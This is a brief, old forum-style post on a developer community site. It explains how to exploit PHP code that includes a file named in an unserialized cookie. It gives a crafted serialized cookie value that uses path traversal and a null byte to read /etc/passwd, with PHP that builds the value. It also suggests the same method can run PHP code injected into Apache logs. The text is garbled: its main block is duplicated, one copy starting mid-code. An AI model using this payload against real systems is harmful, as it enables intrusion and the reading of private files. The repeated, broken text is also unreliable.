how to use this bugs unserialize()
cnbird 2008-07-15 544浏览量
简介:
quite obvious, you need to set a cookie like this:user_settings=a:1:{s:4:"lang";s:32:".
<?php
$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php");
?>
quite obvious, you need to set a cookie like this:
user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}
it is the result of:
[code lang=php]
<?php
$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";
$settings=serialize($settings);
echo $settings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code
$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php");
?>
quite obvious, you need to set a cookie like this:
user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}
it is the result of:
[code lang=php]
<?php
$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";
$settings=serialize($settings);
echo $settings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
集结各类场景实战经验,助你开发运维畅行无忧
其他文章
